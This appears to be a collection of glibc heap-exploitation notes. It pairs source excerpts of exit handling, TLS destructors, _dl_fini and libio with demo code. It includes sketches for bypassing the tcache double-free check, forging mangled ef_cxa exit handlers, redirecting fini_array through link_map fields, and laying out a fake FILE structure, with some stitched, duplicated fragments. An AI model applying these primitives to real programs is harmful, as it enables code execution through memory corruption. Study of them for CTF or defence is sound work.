/* Caller must ensure that we know tc_idx is valid and there's room
   for more chunks.  */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
  e->key = tcache;
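This key check is what turns a naive double free into an immediate abort. A minimal demo of the detection (glibc 2.29+, where tcache_put sets e->key):

#include <stdlib.h>

int main (void)
{
  void *p = malloc (0x40);
  free (p);   /* tcache_put stores e->key = tcache */
  free (p);   /* _int_free finds e->key == tcache, scans the bin and aborts:
                 "free(): double free detected in tcache 2" */
  return 0;
}

Bypassing it usually means corrupting e->key (for example through a UAF write) between the two frees.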
/* Call all functions registered with `atexit' and `on_exit',
   in the reverse of the order in which they were registered,
   perform stdio cleanup, and terminate program execution with STATUS.  */
void
attribute_hidden
__run_exit_handlers (int status, struct exit_function_list **listp,
                     bool run_list_atexit, bool run_dtors)
{
  /* First, call the TLS destructors.  */
#ifndef SHARED
  if (&__call_tls_dtors != NULL)
#endif
    if (run_dtors)
      __call_tls_dtors ();
  /* We do it this way to handle recursive calls to exit () made by
     the functions registered with `atexit' and `on_exit'.  We call
     everyone on the list and use the status value in the last
     exit ().  */
  while (true)
    {
      struct exit_function_list *cur;
__libc_lock_lock (__exit_funcs_lock);
    restart:
      cur = *listp;
      if (cur == NULL)
        {
          /* Exit processing complete.  We will not allow any more
             atexit/on_exit registrations.  */
          __exit_funcs_done = true;
          __libc_lock_unlock (__exit_funcs_lock);
          break;
        }
      while (cur->idx > 0)
        {
          struct exit_function *const f = &cur->fns[--cur->idx];
          const uint64_t new_exitfn_called = __new_exitfn_called;

          /* Unlock the list while we call a foreign function.  */
          __libc_lock_unlock (__exit_funcs_lock);
          switch (f->flavor)
            {
              void (*atfct) (void);
              void (*onfct) (int status, void *arg);
              void (*cxafct) (void *arg, int status);
            case ef_free:
            case ef_us:
              break;
            case ef_on:
              onfct = f->func.on.fn;
#ifdef PTR_DEMANGLE
              PTR_DEMANGLE (onfct);
#endif
              onfct (status, f->func.on.arg);
              break;
            case ef_at:
              atfct = f->func.at;
#ifdef PTR_DEMANGLE
              PTR_DEMANGLE (atfct);
#endif
              atfct ();
              break;
            case ef_cxa:
              /* To avoid dlclose/exit race calling cxafct twice (BZ 22180),
                 we must mark this function as ef_free.  */
              f->flavor = ef_free;
              cxafct = f->func.cxa.fn;
#ifdef PTR_DEMANGLE
              PTR_DEMANGLE (cxafct);
#endif
              cxafct (f->func.cxa.arg, status);
              break;
            }

          /* Re-lock again before looking at global state.  */
          __libc_lock_lock (__exit_funcs_lock);
          if (__glibc_unlikely (new_exitfn_called != __new_exitfn_called))
            /* The last exit function, or another thread, has registered
               more exit functions.  Start the loop over.  */
            goto restart;
        }
      *listp = cur->next;
      if (*listp != NULL)
        /* Don't free the last element in the chain, this is the statically
           allocated element.  */
        free (cur);
      __libc_lock_unlock (__exit_funcs_lock);
    }
  if (run_list_atexit)
    RUN_HOOK (__libc_atexit, ());

  _exit (status);
}
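The reverse-order iteration over cur->fns[--cur->idx] is directly observable from user code:

#include <stdio.h>
#include <stdlib.h>

static void first (void)  { puts ("registered first, runs last");  }
static void second (void) { puts ("registered second, runs first"); }

int main (void)
{
  atexit (first);
  atexit (second);
  return 0;   /* exit () -> __run_exit_handlers: second's line, then first's */
}

Every fn pointer in those handlers is stored mangled, and PTR_DEMANGLE undoes it right before the indirect call. A minimal sketch of the x86-64 scheme (the guard normally lives at fs:0x30; here it is passed explicitly, since leaking or overwriting it is the attacker's problem):

#include <stdint.h>

static uint64_t rol64 (uint64_t v, unsigned n) { return (v << n) | (v >> (64 - n)); }
static uint64_t ror64 (uint64_t v, unsigned n) { return (v >> n) | (v << (64 - n)); }

/* PTR_MANGLE: applied when the handler is registered.  */
static uint64_t ptr_mangle (uint64_t ptr, uint64_t guard)
{
  return rol64 (ptr ^ guard, 0x11);
}

/* PTR_DEMANGLE: applied by __run_exit_handlers before the call.  */
static uint64_t ptr_demangle (uint64_t val, uint64_t guard)
{
  return ror64 (val, 0x11) ^ guard;
}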
int
_IO_cleanup (void)
{
  /* We do *not* want locking.  Some threads might use streams but
     that is their problem, we flush them underneath them.  */
  int result = _IO_flush_all_lockp (0);
  /* We currently don't have a reliable mechanism for making sure that
     C++ static destructors are executed in the correct order.
     So it is possible that other static destructors might want to
     write to cout - and they're supposed to be able to do so.

     The following will make the standard streambufs be unbuffered,
     which forces any output from late destructors to be written out.  */
  _IO_unbuffer_all ();

  return result;
}
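A quick way to watch _IO_cleanup do this work:

#include <stdio.h>

int main (void)
{
  /* No newline, no fflush: the bytes sit in stdout's buffer until exit ()
     reaches _IO_cleanup -> _IO_flush_all_lockp (0).  */
  fputs ("flushed by _IO_cleanup", stdout);
  return 0;   /* replace this with _exit (0) and the output is lost */
}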
/* _IO_str_overflow (fp, c), abridged.  */
int flush_only = c == EOF;
...
pos = fp->_IO_write_ptr - fp->_IO_write_base;
if (pos >= (size_t) (_IO_blen (fp) + flush_only))
  {
    if (fp->_flags & _IO_USER_BUF) /* not allowed to enlarge */
      return EOF;
    else
      {
        ...
        // need to be here
      }
  }
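The guard can be modelled in isolation. A sketch of just the two comparisons that matter (the helper and its values are made up, not libio code):

#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

/* Mirrors the excerpt: pos >= _IO_blen (fp) + flush_only triggers overflow
   handling, and _IO_USER_BUF forbids enlarging the buffer.  */
static bool reaches_enlarge_branch (size_t write_ptr, size_t write_base,
                                    size_t buf_base, size_t buf_end,
                                    int flags, int flush_only)
{
  size_t pos  = write_ptr - write_base;   /* pending bytes in the put area */
  size_t blen = buf_end - buf_base;       /* _IO_blen (fp) */

  if (pos < blen + (size_t) flush_only)
    return false;                         /* still room, no overflow */
  return (flags & 1 /* _IO_USER_BUF */) == 0;
}

int main (void)
{
  /* A "full" put area in a stream-owned buffer reaches the malloc path.  */
  printf ("%d\n", reaches_enlarge_branch (0x100, 0, 0, 0x80, 0, 0));
  return 0;
}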
struct exit_function
  {
    /* `flavour' should be of type of the `enum' above but since we need
       this element in an atomic operation we have to use `long int'.  */
    long int flavor;
    union
      {
        void (*at) (void);
        struct
          {
            void (*fn) (int status, void *arg);
            void *arg;
          } on;
        struct
          {
            void (*fn) (void *arg, int status);
            void *arg;
            void *dso_handle;
          } cxa;
      } func;
  };
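The three union arms map to atexit (at), on_exit (on) and __cxa_atexit (cxa). The extra argument of the on flavor is visible from user code:

#define _DEFAULT_SOURCE
#include <stdio.h>
#include <stdlib.h>

/* on_exit is a GNU/BSD extension matching func.on above: the handler
   receives the exit status plus the registered argument.  */
static void handler (int status, void *arg)
{
  printf ("status=%d arg=%s\n", status, (char *) arg);
}

int main (void)
{
  on_exit (handler, "cookie");
  exit (7);   /* prints "status=7 arg=cookie" */
}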
/* Call the destructors.  This is called either when a thread returns from the
   initial function or when the process exits via the exit function.  */
void
__call_tls_dtors (void)
{
  while (tls_dtor_list)
    {
      struct dtor_list *cur = tls_dtor_list;
      dtor_func func = cur->func;
#ifdef PTR_DEMANGLE
      PTR_DEMANGLE (func);
#endif

      tls_dtor_list = tls_dtor_list->next;
      func (cur->obj);
      /* Ensure that the MAP dereference happens before
         l_tls_dtor_count decrement.  That way, we protect this access from a
         potential DSO unload in _dl_close_worker, which happens when
         l_tls_dtor_count is 0.  See CONCURRENCY NOTES for more detail.  */
      atomic_fetch_add_release (&cur->map->l_tls_dtor_count, -1);
      free (cur);
    }
}
libc_hidden_def (__call_tls_dtors)
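tls_dtor_list is populated by __cxa_thread_atexit_impl, which compilers call for C++ thread_local destructors; it can also be driven directly from C (passing &__dso_handle mimics what compiled code normally does):

#include <stdio.h>

extern int __cxa_thread_atexit_impl (void (*func) (void *), void *obj,
                                     void *dso_symbol);
extern void *__dso_handle;

static void dtor (void *obj)
{
  printf ("tls dtor: %s\n", (char *) obj);
}

int main (void)
{
  __cxa_thread_atexit_impl (dtor, "main thread", &__dso_handle);
  return 0;   /* exit -> __run_exit_handlers -> __call_tls_dtors -> dtor */
}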
for (Lmid_t ns = GL(dl_nns) - 1; ns >= 0; --ns)
  {
    /* Protect against concurrent loads and unloads.  */
    __rtld_lock_lock_recursive (GL(dl_load_lock));
    unsigned int nloaded = GL(dl_ns)[ns]._ns_nloaded;
    /* No need to do anything for empty namespaces or those used for
       auditing DSOs.  */
    if (nloaded == 0
#ifdef SHARED
        || GL(dl_ns)[ns]._ns_loaded->l_auditing != do_audit
#endif
        )
      __rtld_lock_unlock_recursive (GL(dl_load_lock));
    else
      {
        /* Now we can allocate an array to hold all the pointers and
           copy the pointers in.  */
        struct link_map *maps[nloaded];
        unsigned int i;
        struct link_map *l;

        assert (nloaded != 0 || GL(dl_ns)[ns]._ns_loaded == NULL);
        for (l = GL(dl_ns)[ns]._ns_loaded, i = 0; l != NULL; l = l->l_next)
          /* Do not handle ld.so in secondary namespaces.  */
          if (l == l->l_real)
            {
              assert (i < nloaded);
              maps[i] = l;
              l->l_idx = i;
              ++i;

              /* Bump l_direct_opencount of all objects so that they
                 are not dlclose()ed from underneath us.  */
              ++l->l_direct_opencount;
            }
        ...
_rtld_global->_dl_ns[0]._ns_loaded: (struct link_map)

offset  member
0x0     l_addr         (points to the program base by default)
0x18    l_next         (points to the next link map; the linked list should
                        be 4 nodes long)
0x28    l_real         (points to itself)
0x110   l_info[0x1A]   (points to the DT_FINI_ARRAY Elf64_Dyn entry)
0x120   l_info[0x1C]   (points to the DT_FINI_ARRAYSZ Elf64_Dyn entry;
                        l_info[0x1C]->d_un.d_val == sizeof (fini_array))
0x31C   l_init_called  (must be nonzero)

typedef struct
{
  Elf64_Sxword d_tag;           /* Dynamic entry type */
  union
    {
      Elf64_Xword d_val;        /* Integer value */
      Elf64_Addr d_ptr;         /* Address value */
      /* l_info[0x1A]->d_un.d_ptr + l_addr == &fini_array */
    } d_un;
} Elf64_Dyn;
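What _dl_fini ultimately does with those two slots amounts to the sketch below. It scans l_ld instead of l_info because the public <link.h> link_map does not expose l_info; the arithmetic is the same as in the annotations above:

#include <link.h>     /* struct link_map, ElfW */
#include <stddef.h>

static void run_fini_array (struct link_map *map)
{
  ElfW(Addr) *array = NULL;
  size_t n = 0;

  for (ElfW(Dyn) *d = map->l_ld; d->d_tag != DT_NULL; ++d)
    if (d->d_tag == DT_FINI_ARRAY)        /* 0x1A: l_addr + d_ptr = &fini_array */
      array = (ElfW(Addr) *) (map->l_addr + d->d_un.d_ptr);
    else if (d->d_tag == DT_FINI_ARRAYSZ) /* 0x1C: d_val = sizeof (fini_array) */
      n = d->d_un.d_val / sizeof (ElfW(Addr));

  if (array != NULL)
    while (n-- > 0)                       /* entries run in reverse order */
      ((void (*) (void)) array[n]) ();
}

This is why controlling l_addr and the two l_info entries of a writable link map redirects execution at exit.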
'''
__exit_funcs (struct exit_function_list **):

struct exit_function_list
  {
    struct exit_function_list *next;
    size_t idx;
    struct exit_function fns[32];
  };

struct exit_function
  {
    /* `flavour' should be of type of the `enum' above but since we need
       this element in an atomic operation we have to use `long int'.  */
    long int flavor;
    union
      {
        void (*at) (void);
        struct
          {
            void (*fn) (int status, void *arg);
            void *arg;
          } on;
        struct
          {
            void (*fn) (void *arg, int status);
            void *arg;
            void *dso_handle;
          } cxa;
      } func;
  };
'''
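Putting the pieces together, a forged ef_cxa slot for __exit_funcs can be sketched like this; guard is the leaked (or zeroed) pointer-guard value, and every address is something the exploit must supply:

#include <stdint.h>

/* Mirrors the cxa arm of struct exit_function above.
   flavor: enum { ef_free, ef_us, ef_on, ef_at, ef_cxa } => ef_cxa == 4.  */
struct fake_exit_function
{
  long flavor;        /* 4 == ef_cxa */
  uint64_t fn;        /* must hold PTR_MANGLE (target) */
  uint64_t arg;       /* first argument passed to target */
  uint64_t dso_handle;
};

static uint64_t rol64 (uint64_t v, unsigned n) { return (v << n) | (v >> (64 - n)); }

static struct fake_exit_function
forge_cxa (uint64_t target, uint64_t arg, uint64_t guard)
{
  /* __run_exit_handlers demangles fn, then calls target (arg, status).  */
  struct fake_exit_function f = { 4, rol64 (target ^ guard, 0x11), arg, 0 };
  return f;
}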
'''
_rtld_global->_dl_ns[0]._ns_loaded: (struct link_map)

offset  member
0x0     l_addr         (points to the program base by default)
0x18    l_next         (points to the next link map; the linked list should
                        hold at least 4 nodes, and the tail node's l_next == 0)
0x20    l_prev         (points to the previous link map; the head node's
                        l_prev == 0)
0x110   l_info[0x1A]   (points to the DT_FINI_ARRAY Elf64_Dyn entry;
                        l_info[0x1A]->d_un.d_ptr + l_addr == &fini_array)
0x120   l_info[0x1C]   (points to the DT_FINI_ARRAYSZ Elf64_Dyn entry;
                        l_info[0x1C]->d_un.d_val == sizeof (fini_array))
'''
'''
struct _IO_FILE
{
  0x10  int _flags;             /* High-order word is _IO_MAGIC; rest is flags. */

  /* The following pointers correspond to the C++ streambuf protocol. */
  0x18  char *_IO_read_ptr;     /* Current read pointer */
  0x20  char *_IO_read_end;     /* End of get area. */
  0x28  char *_IO_read_base;    /* Start of putback+get area. */
  0x30  char *_IO_write_base;   /* Start of put area. */
  0x38  char *_IO_write_ptr;    /* Current put pointer. */
  0x40  char *_IO_write_end;    /* End of put area. */
  0x48  char *_IO_buf_base;     /* Start of reserve area. */
  0x50  char *_IO_buf_end;      /* End of reserve area. */

  /* The following fields are used to support backing up and undo. */
  0x58  char *_IO_save_base;    /* Pointer to start of non-current get area. */
  0x60  char *_IO_backup_base;  /* Pointer to first valid character of backup area */
  0x68  char *_IO_save_end;     /* Pointer to end of non-current get area. */

  0x70  struct _IO_marker *_markers;
  0x78  struct _IO_FILE *_chain;
  0x80  int _fileno;
  0x84  int _flags2;
        __off_t _old_offset;    /* This used to be _offset but it's too small. */

        /* 1+column number of pbase(); 0 is unknown. */
        unsigned short _cur_column;
        signed char _vtable_offset;
        char _shortbuf[1];
        _IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};
'''
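If, as the offsets above suggest, the fake FILE sits at the start of a heap chunk (they are the standard x86-64 _IO_FILE offsets shifted by the 0x10-byte chunk header), building it is just qword pokes at those offsets. A minimal sketch with placeholder values:

#include <stdint.h>
#include <string.h>

/* Writes one qword at a given offset of a raw buffer standing in for the
   chunk holding the fake FILE.  Offsets follow the table above.  */
static void set_qword (uint8_t *chunk, size_t off, uint64_t val)
{
  memcpy (chunk + off, &val, sizeof val);
}

int main (void)
{
  uint8_t chunk[0x100] = { 0 };

  set_qword (chunk, 0x30, 0);   /* _IO_write_base */
  set_qword (chunk, 0x38, 1);   /* _IO_write_ptr > _IO_write_base: the stream
                                   looks dirty, so a flush walk acts on it */
  /* ... remaining fields (_chain at 0x78, _lock, vtable, ...) as needed ... */
  return 0;
}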